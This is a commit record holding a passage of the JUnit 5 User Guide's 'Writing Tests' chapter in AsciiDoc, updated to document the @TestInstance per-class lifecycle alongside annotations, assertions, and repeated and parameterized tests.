{"commit":"cf06d2073bff161f1df2749d6626682683df1041","subject":"Document @TestInstance lifecycle support in the User Guide","message":"Document @TestInstance lifecycle support in the User Guide\n\nIssue #419\n","repos":"sbrannen\/junit-lambda,junit-team\/junit-lambda","old_file":"documentation\/src\/docs\/asciidoc\/writing-tests.adoc","new_file":"documentation\/src\/docs\/asciidoc\/writing-tests.adoc","new_contents":"[[writing-tests]]\n== Writing Tests\n\n[source,java,indent=0]\n.A first test case\n----\ninclude::{testDir}\/example\/FirstJUnit5Tests.java[tags=user_guide]\n----\n\n[[writing-tests-annotations]]\n=== Annotations\n\nJUnit Jupiter supports the following annotations for configuring tests and extending the framework.\n\nAll core annotations are located in the `{api-package}` package in the `junit-jupiter-api`\nmodule.\n\n[cols=\"20,80\"]\n|===\n| Annotation | Description\n\n| `@Test` | Denotes that a method is a test method. Unlike JUnit 4's `@Test` annotation, this annotation does not declare any attributes, since test extensions in JUnit Jupiter operate based on their own dedicated annotations.\n| `@RepeatedTest` | Denotes that a method is a test template for a <<writing-tests-repeated-tests, repeated test>>\n| `@TestFactory` | Denotes that a method is a test factory for <<writing-tests-dynamic-tests, dynamic tests>>\n| `@TestInstance` | Used to configure the <<writing-tests-test-instance-lifecycle, test instance lifecycle>> for the annotated test class\n| `@DisplayName` | Declares a custom display name for the test class or test method\n| `@BeforeEach` | Denotes that the annotated method should be executed _before_ *each* `@Test`, `@RepeatedTest`, `@ParameterizedTest`, or `@TestFactory` method in the current class; analogous to JUnit 4's `@Before`. Such methods are _inherited_.\n| `@AfterEach` | Denotes that the annotated method should be executed _after_ *each* `@Test`, `@RepeatedTest`, `@ParameterizedTest`, or `@TestFactory` method in the current class; analogous to JUnit 4's `@After`. Such methods are _inherited_.\n| `@BeforeAll` | Denotes that the annotated method should be executed _before_ *all* `@Test`, `@RepeatedTest`, `@ParameterizedTest`, and `@TestFactory` methods in the current class; analogous to JUnit 4's `@BeforeClass`. Such methods are _inherited_ and must be `static` unless the test class is annotated with `@TestInstance(Lifecycle.PER_CLASS)`.\n| `@AfterAll` | Denotes that the annotated method should be executed _after_ *all* `@Test`, `@RepeatedTest`, `@ParameterizedTest`, and `@TestFactory` methods in the current class; analogous to JUnit 4's `@AfterClass`. Such methods are _inherited_ and must be `static` unless the test class is annotated with `@TestInstance(Lifecycle.PER_CLASS)`.\n| `@Nested` | Denotes that the annotated class is a nested, non-static test class. `@BeforeAll` and `@AfterAll` methods cannot be used in a `@Nested` test class unless it is annotated with `@TestInstance(Lifecycle.PER_CLASS)`.\n| `@Tag` | Used to declare _tags_ for filtering tests, either at the class or method level; analogous to test groups in TestNG or Categories in JUnit 4\n| `@Disabled` | Used to _disable_ a test class or test method; analogous to JUnit 4's `@Ignore`\n| `@ExtendWith` | Used to register custom <<extensions,extensions>>\n|===\n\n[[writing-tests-meta-annotations]]\n==== Meta-Annotations and Composed Annotations\n\nJUnit Jupiter annotations can be used as _meta-annotations_. That means that you can define\nyour own _composed annotation_ that will automatically _inherit_ the semantics of its\nmeta-annotations.\n\nFor example, instead of copying and pasting `@Tag(\"fast\")` throughout your code base (see\n<<writing-tests-tagging-and-filtering>>), you can create a custom _composed annotation_ named `@Fast`\nas follows. `@Fast` can then be used as a drop-in replacement for `@Tag(\"fast\")`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/Fast.java[tags=user_guide]\n----\n\n[[writing-tests-standard]]\n=== Standard Test Class\n\n[source,java,indent=0]\n.A standard test case\n----\ninclude::{testDir}\/example\/StandardTests.java[tags=user_guide]\n----\n\nNOTE: Neither test classes nor test methods need to be `public`.\n\n[[writing-tests-display-names]]\n=== Display Names\n\nTest classes and test methods can declare custom display names -- with spaces, special\ncharacters, and even emojis -- that will be displayed by test runners and test reporting.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/DisplayNameDemo.java[tags=user_guide]\n----\n\n[[writing-tests-assertions]]\n=== Assertions\n\nJUnit Jupiter comes with many of the assertion methods that JUnit 4 has and adds a few\nthat lend themselves well to being used with Java 8 lambdas. All JUnit Jupiter assertions\nare `static` methods in the `{Assertions}` class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/AssertionsDemo.java[tags=user_guide]\n----\n\n[[writing-tests-assertions-third-party]]\n==== Third-party Assertion Libraries\n\nEven though the assertion facilities provided by JUnit Jupiter are sufficient for many\ntesting scenarios, there are times when more power and additional functionality such as\n_matchers_ are desired or required. In such cases, the JUnit team recommends the use of\nthird-party assertion libraries such as {AssertJ}, {Hamcrest}, {Truth}, etc. Developers\nare therefore free to use the assertion library of their choice.\n\nFor example, the combination of _matchers_ and a fluent API can be used to make\nassertions more descriptive and readable. However, JUnit Jupiter's `{Assertions}` class\ndoes not provide an\nhttp:\/\/junit.org\/junit4\/javadoc\/latest\/org\/junit\/Assert.html#assertThat[`assertThat()`]\nmethod like the one found in JUnit 4's `org.junit.Assert` class which accepts a Hamcrest\nhttp:\/\/junit.org\/junit4\/javadoc\/latest\/org\/hamcrest\/Matcher.html[`Matcher`]. Instead,\ndevelopers are encouraged to use the built-in support for matchers provided by third-party\nassertion libraries.\n\nThe following example demonstrates how to use the `assertThat()` support from Hamcrest in\na JUnit Jupiter test. As long as the Hamcrest library has been added to the classpath,\nyou can statically import methods such as `assertThat()`, `is()`, and `equalTo()` and\nthen use them in tests like in the `assertWithHamcrestMatcher()` method below.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/HamcrestAssertionDemo.java[tags=user_guide]\n----\n\nNaturally, legacy tests based on the JUnit 4 programming model can continue using\n`org.junit.Assert#assertThat`.\n\n[[writing-tests-assumptions]]\n=== Assumptions\n\nJUnit Jupiter comes with a subset of the assumption methods that JUnit 4 provides and adds a\nfew that lend themselves well to being used with Java 8 lambdas. All JUnit Jupiter assumptions\nare static methods in the `{Assumptions}` class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/AssumptionsDemo.java[tags=user_guide]\n----\n\n[[writing-tests-disabling]]\n=== Disabling Tests\n\nHere's a disabled test case.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/DisabledClassDemo.java[tags=user_guide]\n----\n\nAnd here's a test case with a disabled test method.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/DisabledTestsDemo.java[tags=user_guide]\n----\n\n[[writing-tests-tagging-and-filtering]]\n=== Tagging and Filtering\n\nTest classes and methods can be tagged. Those tags can later be used to filter\n<<running-tests,test discovery and execution>>.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/TaggingDemo.java[tags=user_guide]\n----\n\n[[writing-tests-test-instance-lifecycle]]\n=== Test Instance Lifecycle\n\nIn order to allow individual test methods to be executed in isolation and to avoid\nunexpected side effects due to mutable test instance state, JUnit creates a new instance\nof each test class before executing each _test_ method (see note below for what qualifies\nas a _test_ method). This \"per-method\" test instance lifecycle is the default behavior in\nJUnit Jupiter and is analogous to all previous versions of JUnit.\n\nIf you would prefer that JUnit Jupiter execute all test methods on the same test\ninstance, simply annotate your test class with `@TestInstance(Lifecycle.PER_CLASS)`. When\nusing this mode, a new test instance will be created once per test class. Thus, if your\ntest methods rely on state stored in instance variables, you may need to reset that state\nin `@BeforeEach` or `@AfterEach` methods.\n\nThe \"per-class\" mode has some additional benefits over the default \"per-method\" mode.\nSpecifically, with the \"per-class\" mode it becomes possible to declare `@BeforeAll` and\n`@AfterAll` on non-static methods as well as on interface `default` methods. The\n\"per-class\" mode therefore also makes it possible to use `@BeforeAll` and `@AfterAll`\nmethods in `@Nested` test classes.\n\nIf you are authoring tests using the Kotlin programming language, you may also find it\neasier to implement `@BeforeAll` and `@AfterAll` methods by switching to the \"per-class\"\ntest instance lifecycle mode.\n\nNOTE: In the context of test instance lifecycle a _test_ method is any method annotated\nwith `@Test`, `@RepeatedTest`, `@ParameterizedTest`, `@TestFactory`, or `@TestTemplate`.\n\n[[writing-tests-nested]]\n=== Nested Tests\n\nNested tests give the test writer more capabilities to express the relationship among\nseveral group of tests. Here's an elaborate example.\n\n[source,java,indent=0]\n.Nested test suite for testing a stack\n----\ninclude::{testDir}\/example\/TestingAStackDemo.java[tags=user_guide]\n----\n\nNOTE: _Only non-static nested classes_ (i.e. _inner classes_) can serve as `@Nested` test\nclasses. Nesting can be arbitrarily deep, and those inner classes are considered to be\nfull members of the test class family with one exception: `@BeforeAll` and `@AfterAll`\nmethods do not work _by default_. The reason is that Java does not allow `static` members\nin inner classes. However, this restriction can be circumvented by annotating a `@Nested`\ntest class with `@TestInstance(Lifecycle.PER_CLASS)` (see\n<<writing-tests-test-instance-lifecycle>>).\n\n[[writing-tests-dependency-injection]]\n=== Dependency Injection for Constructors and Methods\n\nIn all prior JUnit versions, test constructors or methods were not allowed to have\nparameters (at least not with the standard `Runner` implementations). As one of the major\nchanges in JUnit Jupiter, both test constructors and methods are now permitted to have\nparameters. This allows for greater flexibility and enables _Dependency Injection_ for\nconstructors and methods.\n\n`{ParameterResolver}` defines the API for test extensions that wish to _dynamically_\nresolve parameters at runtime. If a test constructor or a `@Test`, `@TestFactory`,\n`@BeforeEach`, `@AfterEach`, `@BeforeAll`, or `@AfterAll` method accepts a parameter, the\nparameter must be resolved at runtime by a registered `ParameterResolver`.\n\nThere are currently three built-in resolvers that are registered automatically.\n\n* `{TestInfoParameterResolver}`: if a method parameter is of type `{TestInfo}`, the\n `TestInfoParameterResolver` will supply an instance of `TestInfo` corresponding to the\n current test as the value for the parameter. The `TestInfo` can then be used to retrieve\n information about the current test such as the test's display name, the test class, the\n test method, or associated tags. The display name is either a technical name, such as\n the name of the test class or test method, or a custom name configured via `@DisplayName`.\n+\n`{TestInfo}` acts as a drop-in replacement for the `TestName` rule from JUnit 4. The\nfollowing demonstrates how to have `TestInfo` injected into a test constructor,\n`@BeforeEach` method, and `@Test` method.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/TestInfoDemo.java[tags=user_guide]\n----\n\n* `RepetitionInfoParameterResolver`: if a method parameter in a `@RepeatedTest`,\n `@BeforeEach`, or `@AfterEach` method is of type `{RepetitionInfo}`, the\n `RepetitionInfoParameterResolver` will supply an instance of `RepetitionInfo`.\n `RepetitionInfo` can then be used to retrieve information about the current repetition\n and the total number of repetitions for the corresponding `@RepeatedTest`. Note,\n however, that `RepetitionInfoParameterResolver` is not registered outside the context\n of a `@RepeatedTest`. See <<writing-tests-repeated-tests-examples>>.\n\n* `{TestReporterParameterResolver}`: if a method parameter is of type `{TestReporter}`, the\n `TestReporterParameterResolver` will supply an instance of `TestReporter`.\n The `TestReporter` can be used to publish additional data about the current test run.\n The data can be consumed through `{TestExecutionListener}.reportingEntryPublished()` and thus\n be viewed by IDEs or included in reports.\n+\nIn JUnit Jupiter you should use `TestReporter` where\nyou used to print information to `stdout` or `stderr` in JUnit 4.\nUsing `@RunWith(JUnitPlatform.class)` will even output all reported entries to `stdout`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/TestReporterDemo.java[tags=user_guide]\n----\n\nNOTE: Other parameter resolvers must be explicitly enabled by registering appropriate\n<<extensions,extensions>> via `@ExtendWith`.\n\nCheck out the `{MockitoExtension}` for an example of a custom `{ParameterResolver}`.\nWhile not intended to be production-ready, it demonstrates the simplicity and\nexpressiveness of both the extension model and the parameter resolution process.\n`MyMockitoTest` demonstrates how to inject Mockito mocks into `@BeforeEach` and `@Test`\nmethods.\n\n[source,java,indent=0]\n----\nimport static org.junit.jupiter.api.Assertions.assertEquals;\nimport static org.mockito.Mockito.when;\n\nimport org.junit.jupiter.api.BeforeEach;\nimport org.junit.jupiter.api.Test;\nimport org.junit.jupiter.api.extension.ExtendWith;\nimport org.mockito.Mock;\nimport com.example.Person;\nimport com.example.mockito.MockitoExtension;\n\n@ExtendWith(MockitoExtension.class)\nclass MyMockitoTest {\n\n\t@BeforeEach\n\tvoid init(@Mock Person person) {\n\t\twhen(person.getName()).thenReturn(\"Dilbert\");\n\t}\n\n\t@Test\n\tvoid simpleTestWithInjectedMock(@Mock Person person) {\n\t\tassertEquals(\"Dilbert\", person.getName());\n\t}\n\n}\n----\n\n[[writing-tests-test-interfaces-and-default-methods]]\n=== Test Interfaces and Default Methods\n\nJUnit Jupiter allows `@Test`, `@RepeatedTest`, `@ParameterizedTest`, `@TestFactory`,\n`@TestTemplate`, `@BeforeEach`, and `@AfterEach` to be declared on interface `default`\nmethods. `@BeforeAll` and `@AfterAll` can either be declared on `static` methods in a\ntest interface or on interface `default` methods _if_ the concrete test class is\nannotated with `@TestInstance(Lifecycle.PER_CLASS)` (see\n<<writing-tests-test-instance-lifecycle>>). Here are some examples.\n\n[source,java]\n----\ninclude::{testDir}\/example\/testinterface\/TestLifecycleLogger.java[tags=user_guide]\n----\n\n[source,java]\n----\ninclude::{testDir}\/example\/testinterface\/TestInterfaceDynamicTestsDemo.java[tags=user_guide]\n----\n\n`@ExtendWith` and `@Tag` can be declared on a test interface so that classes that\nimplement the interface automatically inherit its tags and extensions. See\n<<extensions-lifecycle-callbacks-before-after-execution>> for the source code of the\n<<extensions-lifecycle-callbacks-timing-extension, TimingExtension>>.\n\n[source,java]\n----\ninclude::{testDir}\/example\/testinterface\/TimeExecutionLogger.java[tags=user_guide]\n----\n\nIn your test class you can then implement these test interfaces to have them applied.\n\n[source,java]\n----\ninclude::{testDir}\/example\/testinterface\/TestInterfaceDemo.java[tags=user_guide]\n----\n\nRunning the `TestInterfaceDemo` results in output similar to the following:\n\n....\n:junitPlatformTest\nINFO example.TestLifecycleLogger - Before all tests\nINFO example.TestLifecycleLogger - About to execute [dynamicTestsFromCollection()]\nINFO example.TimingExtension - Method [dynamicTestsFromCollection] took 13 ms.\nINFO example.TestLifecycleLogger - Finished executing [dynamicTestsFromCollection()]\nINFO example.TestLifecycleLogger - About to execute [isEqualValue()]\nINFO example.TimingExtension - Method [isEqualValue] took 1 ms.\nINFO example.TestLifecycleLogger - Finished executing [isEqualValue()]\nINFO example.TestLifecycleLogger - After all tests\n\nTest run finished after 190 ms\n[ 3 containers found ]\n[ 0 containers skipped ]\n[ 3 containers started ]\n[ 0 containers aborted ]\n[ 3 containers successful ]\n[ 0 containers failed ]\n[ 3 tests found ]\n[ 0 tests skipped ]\n[ 3 tests started ]\n[ 0 tests aborted ]\n[ 3 tests successful ]\n[ 0 tests failed ]\n\nBUILD SUCCESSFUL\n....\n\nAnother possible application of this feature is to write tests for interface contracts.\nFor example, you can write tests for how implementations of `Object.equals` or\n`Comparable.compareTo` should behave as follows.\n\n[source,java]\n----\ninclude::{testDir}\/example\/defaultmethods\/Testable.java[tags=user_guide]\n----\n\n[source,java]\n----\ninclude::{testDir}\/example\/defaultmethods\/EqualsContract.java[tags=user_guide]\n----\n\n[source,java]\n----\ninclude::{testDir}\/example\/defaultmethods\/ComparableContract.java[tags=user_guide]\n----\n\nIn your test class you can then implement both contract interfaces thereby inheriting the\ncorresponding tests. Of course you'll have to implement the abstract methods.\n\n[source,java]\n----\ninclude::{testDir}\/example\/defaultmethods\/StringTests.java[tags=user_guide]\n----\n\nNOTE: The above tests are merely meant as examples and therefore not complete.\n\n\n[[writing-tests-repeated-tests]]\n=== Repeated Tests\n\nJUnit Jupiter provides the ability to repeat a test a specified number of times simply by\nannotating a method with `@RepeatedTest` and specifying the total number of repetitions\ndesired. Each invocation of a repeated test behaves like the execution of a regular\n`@Test` method with full support for the same lifecycle callbacks and extensions.\n\nThe following example demonstrates how to declare a test named `repeatedTest()` that\nwill be automatically repeated 10 times.\n\n[source,java]\n----\n@RepeatedTest(10)\nvoid repeatedTest() {\n\t\/\/ ...\n}\n----\n\nIn addition to specifying the number of repetitions, a custom display name can be\nconfigured for each repetition via the `name` attribute of the `@RepeatedTest`\nannotation. Furthermore, the display name can be a pattern composed of a combination of\nstatic text and dynamic placeholders. The following placeholders are currently supported.\n\n- `{displayName}`: display name of the `@RepeatedTest` method\n- `{currentRepetition}`: the current repetition count\n- `{totalRepetitions}`: the total number of repetitions\n\nThe default display name for a given repetition is generated based on the following\npattern: `\"repetition {currentRepetition} of {totalRepetitions}\"`. Thus, the display\nnames for individual repetitions of the previous `repeatedTest()` example would be:\n`repetition 1 of 10`, `repetition 2 of 10`, etc. If you would like the display name of\nthe `@RepeatedTest` method included in the name of each repetition, you can define your\nown custom pattern or use the predefined `RepeatedTest.LONG_DISPLAY_NAME` pattern. The\nlatter is equal to `\"{displayName} :: repetition {currentRepetition} of\n{totalRepetitions}\"` which results in display names for individual repetitions like\n`repeatedTest() :: repetition 1 of 10`, `repeatedTest() :: repetition 2 of 10`, etc.\n\nIn order to retrieve information about the current repetition and the total number of\nrepetitions programmatically, a developer can choose to have an instance of\n`RepetitionInfo` injected into a `@RepeatedTest`, `@BeforeEach`, or `@AfterEach` method.\n\n[[writing-tests-repeated-tests-examples]]\n==== Repeated Test Examples\n\nThe `RepeatedTestsDemo` class at the end of this section demonstrates several examples of\nrepeated tests.\n\nThe `repeatedTest()` method is identical to example from the previous section; whereas,\n`repeatedTestWithRepetitionInfo()` demonstrates how to have an instance of\n`RepetitionInfo` injected into a test to access the total number of repetitions for the\ncurrent repeated test.\n\nThe next two methods demonstrate how to include a custom `@DisplayName` for the\n`@RepeatedTest` method in the display name of each repetition. `customDisplayName()`\ncombines a custom display name with a custom pattern and then uses `TestInfo` to verify\nthe format of the generated display name. `Repeat!` is the `{displayName}` which comes\nfrom the `@DisplayName` declaration, and `1\/1` comes from\n`{currentRepetition}\/{totalRepetitions}`. In contrast,\n`customDisplayNameWithLongPattern()` uses the aforementioned predefined\n`RepeatedTest.LONG_DISPLAY_NAME` pattern.\n\n`repeatedTestInGerman()` demonstrates the ability to translate display names of repeated\ntests into foreign languages -- in this case German, resulting in names for individual\nrepetitions such as: `Wiederholung 1 von 5`, `Wiederholung 2 von 5`, etc.\n\nSince the `beforeEach()` method is annotated with `@BeforeEach` it will get executed\nbefore each repetition of each repeated test. By having the `TestInfo` and\n`RepetitionInfo` injected into the method, we see that it's possible to obtain\ninformation about the currently executing repeated test. Executing `RepeatedTestsDemo`\nwith the `INFO` log level enabled results in the following output.\n\n....\nINFO: About to execute repetition 1 of 10 for repeatedTest\nINFO: About to execute repetition 2 of 10 for repeatedTest\nINFO: About to execute repetition 3 of 10 for repeatedTest\nINFO: About to execute repetition 4 of 10 for repeatedTest\nINFO: About to execute repetition 5 of 10 for repeatedTest\nINFO: About to execute repetition 6 of 10 for repeatedTest\nINFO: About to execute repetition 7 of 10 for repeatedTest\nINFO: About to execute repetition 8 of 10 for repeatedTest\nINFO: About to execute repetition 9 of 10 for repeatedTest\nINFO: About to execute repetition 10 of 10 for repeatedTest\nINFO: About to execute repetition 1 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 2 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 3 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 4 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 5 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 1 of 1 for customDisplayName\nINFO: About to execute repetition 1 of 1 for customDisplayNameWithLongPattern\nINFO: About to execute repetition 1 of 5 for repeatedTestInGerman\nINFO: About to execute repetition 2 of 5 for repeatedTestInGerman\nINFO: About to execute repetition 3 of 5 for repeatedTestInGerman\nINFO: About to execute repetition 4 of 5 for repeatedTestInGerman\nINFO: About to execute repetition 5 of 5 for repeatedTestInGerman\n....\n\n[source,java]\n----\ninclude::{testDir}\/example\/RepeatedTestsDemo.java[tags=user_guide]\n----\n\nWhen using the `ConsoleLauncher` or the `junitPlatformTest` Gradle plugin with the\nunicode theme enabled, execution of `RepeatedTestsDemo` results in the following output\nto the console.\n\n....\n\u251c\u2500 RepeatedTestsDemo \u2714\n\u2502 \u251c\u2500 repeatedTest() \u2714\n\u2502 \u2502 \u251c\u2500 repetition 1 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 2 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 3 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 4 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 5 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 6 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 7 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 8 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 9 of 10 \u2714\n\u2502 \u2502 \u2514\u2500 repetition 10 of 10 \u2714\n\u2502 \u251c\u2500 repeatedTestWithRepetitionInfo(RepetitionInfo) \u2714\n\u2502 \u2502 \u251c\u2500 repetition 1 of 5 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 2 of 5 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 3 of 5 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 4 of 5 \u2714\n\u2502 \u2502 \u2514\u2500 repetition 5 of 5 \u2714\n\u2502 \u251c\u2500 Repeat! \u2714\n\u2502 \u2502 \u2514\u2500 Repeat! 1\/1 \u2714\n\u2502 \u251c\u2500 Details... \u2714\n\u2502 \u2502 \u2514\u2500 Details... :: repetition 1 of 1 \u2714\n\u2502 \u2514\u2500 repeatedTestInGerman() \u2714\n\u2502 \u251c\u2500 Wiederholung 1 von 5 \u2714\n\u2502 \u251c\u2500 Wiederholung 2 von 5 \u2714\n\u2502 \u251c\u2500 Wiederholung 3 von 5 \u2714\n\u2502 \u251c\u2500 Wiederholung 4 von 5 \u2714\n\u2502 \u2514\u2500 Wiederholung 5 von 5 \u2714\n....\n\n\n[[writing-tests-parameterized-tests]]\n=== Parameterized Tests\n\nParameterized tests make it possible to run a test multiple times with different arguments. They are\ndeclared just like regular `@Test` methods but use the `@ParameterizedTest` annotation instead. In\naddition, you must declare at least one _source_ that will provide the arguments for each\ninvocation.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=first_example]\n----\n\nThis parameterized test uses the `@ValueSource` annotation to specify a `String` array as the source\nof arguments. When executing this method, each invocation will be reported separately. For instance,\nthe `ConsoleLauncher` will print output similar to the following.\n\n....\ntestWithStringParameter(String) \u2714\n\u251c\u2500 [1] Hello \u2714\n\u2514\u2500 [2] World \u2714\n....\n\n[[writing-tests-parameterized-tests-setup]]\n==== Required Setup\n\nIn order to use parameterized tests you need to add a dependency on the `junit-jupiter-params`\nartifact. Please refer to <<dependency-metadata>> for details.\n\n[[writing-tests-parameterized-tests-sources]]\n==== Sources of Arguments\n\nOut of the box, JUnit Jupiter provides quite a few _source_ annotations. Each of the\nfollowing subsections provides a brief overview and an example for each of them. Please\nrefer to the JavaDoc in the `{params-provider-package}` package for additional\ninformation.\n\n[[writing-tests-parameterized-tests-sources-ValueSource]]\n===== @ValueSource\n\n`@ValueSource` is one of the simplest possible sources. It lets you specify an array of literals of\nprimitive types (either `String`, `int`, `long`, or `double`) and can only be used for providing a\nsingle parameter per invocation.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ValueSource_example]\n----\n\n[[writing-tests-parameterized-tests-sources-EnumSource]]\n===== @EnumSource\n\n`@EnumSource` provides a convenient way to use `Enum` constants. The annotation provides an optional\n`names` parameter that lets you specify which constants shall be used. If omitted, all constants\nwill be used like in the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=EnumSource_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=EnumSource_include_example]\n----\n\nThe `@EnumSource` annotation also provides an optional `mode` parameter that enables\nfine-grained control over which constants are passed to the test method. For example, you\ncan exclude names from the enum constant pool or specify regular expressions as in the\nfollowing examples.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=EnumSource_exclude_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=EnumSource_regex_example]\n----\n\n[[writing-tests-parameterized-tests-sources-MethodSource]]\n===== @MethodSource\n\n`@MethodSource` allows you to refer to one or multiple methods of the test class. Each method must\nreturn a `Stream`, an `Iterable`, an `Iterator`, or an array of arguments. In addition, each method\nmust be `static` and must not accept any arguments.\n\nIf you only need a single parameter, you can return instances of the parameter type directly as\ndemonstrated by the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=simple_MethodSource_example]\n----\n\nStreams for primitive types (`DoubleStream`, `IntStream`, and `LongStream`) are also supported.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=primitive_MethodSource_example]\n----\n\nIn case you need multiple parameters, you need to return an `Arguments` instances as shown below.\nNote that `Arguments.of(Object...)` is a static factory method defined in the interface itself.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=multi_arg_MethodSource_example]\n----\n\n[[writing-tests-parameterized-tests-sources-CsvSource]]\n===== @CsvSource\n\n`@CsvSource` allows you to express argument lists as comma-separated values (i.e.,\n`String` literals).\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=CsvSource_example]\n----\n\n[[writing-tests-parameterized-tests-sources-CsvFileSource]]\n===== @CsvFileSource\n\n`@CsvFileSource` lets you use CSV files from the classpath. Each line from a CSV file\nresults in one invocation of the parameterized test.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=CsvFileSource_example]\n----\n\n[source,csv,indent=0]\n.two-column.csv\n----\ninclude::{testResourcesDir}\/two-column.csv[]\n----\n\n[[writing-tests-parameterized-tests-sources-ArgumentsSource]]\n===== @ArgumentsSource\n\n`@ArgumentsSource` can be used to specify a custom, reusable `ArgumentsProvider`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsSource_example]\n----\n\n\n[[writing-tests-parameterized-tests-argument-conversion]]\n==== Argument Conversion\n\n[[writing-tests-parameterized-tests-argument-conversion-implicit]]\n===== Implicit Conversion\n\nTo support use cases like `@CsvSource`, JUnit Jupiter provides a number of built-in implicit\ntype converters. The conversion process depends on the declared type of each method parameter.\n\nFor example, if a `@ParameterizedTest` declares a parameter of type `TimeUnit` and the\nactual type supplied by the declared source is a `String`, the string will automatically\nbe converted into the corresponding `TimeUnit` enum constant.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=implicit_conversion_example]\n----\n\n`String` instances are currently implicitly converted to the following target types.\n\n[cols=\"10,90\"]\n|===\n| Target Type | Example\n\n| `boolean`\/`Boolean` | `\"true\"` \u2192 `true`\n| `byte`\/`Byte` | `\"1\"` \u2192 `(byte) 1`\n| `char`\/`Character` | `\"o\"` \u2192 `'o'`\n| `short`\/`Short` | `\"1\"` \u2192 `(short) 1`\n| `int`\/`Integer` | `\"1\"` \u2192 `1`\n| `long`\/`Long` | `\"1\"` \u2192 `1L`\n| `float`\/`Float` | `\"1.0\"` \u2192 `1.0f`\n| `double`\/`Double` | `\"1.0\"` \u2192 `1.0d`\n| `Enum` subclass | `\"SECONDS\"` \u2192 `TimeUnit.SECONDS`\n| `java.time.Instant` | `\"1970-01-01T00:00:00Z\"` \u2192 `Instant.ofEpochMilli(0)`\n| `java.time.LocalDate` | `\"2017-03-14\"` \u2192 `LocalDate.of(2017, 3, 14)`\n| `java.time.LocalDateTime` | `\"2017-03-14T12:34:56.789\"` \u2192 `LocalDateTime.of(2017, 3, 14, 12, 34, 56, 789_000_000)`\n| `java.time.LocalTime` | `\"12:34:56.789\"` \u2192 `LocalTime.of(12, 34, 56, 789_000_000)`\n| `java.time.OffsetDateTime` | `\"2017-03-14T12:34:56.789Z\"` \u2192 `OffsetDateTime.of(2017, 3, 14, 12, 34, 56, 789_000_000, ZoneOffset.UTC)`\n| `java.time.OffsetTime` | `\"12:34:56.789Z\"` \u2192 `OffsetTime.of(12, 34, 56, 789_000_000, ZoneOffset.UTC)`\n| `java.time.Year` | `\"2017\"` \u2192 `Year.of(2017)`\n| `java.time.YearMonth` | `\"2017-03\"` \u2192 `YearMonth.of(2017, 3)`\n| `java.time.ZonedDateTime` | `\"2017-03-14T12:34:56.789Z\"` \u2192 `ZonedDateTime.of(2017, 3, 14, 12, 34, 56, 789_000_000, ZoneOffset.UTC)`\n|===\n\n[[writing-tests-parameterized-tests-argument-conversion-explicit]]\n===== Explicit Conversion\n\nInstead of using implicit argument conversion you may explicitly specify an `ArgumentConverter` to\nuse for a certain parameter using the `@ConvertWith` annotation like in the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=explicit_conversion_example]\n----\n\nExplicit argument converters are meant to be implemented by test authors. Thus,\n`junit-jupiter-params` only provides a single explicit argument converter that may also serve as a\nreference implementation: `JavaTimeArgumentConverter`. It is used via the composed annotation\n`JavaTimeConversionPattern`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=explicit_java_time_converter]\n----\n\n\n[[writing-tests-parameterized-tests-display-names]]\n==== Customizing Display Names\n\nBy default, the display name of a parameterized test invocation contains the invocation\nindex and the `String` representation of all arguments for that specific invocation.\nHowever, you can customize invocation display names via the `name` attribute of the\n`@ParameterizedTest` annotation like in the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=custom_display_names]\n----\n\nWhen executing the above method using the `ConsoleLauncher` you will see output similar to the following.\n\n....\nDisplay name of container \u2714\n\u251c\u2500 1 ==> first='foo', second=1 \u2714\n\u251c\u2500 2 ==> first='bar', 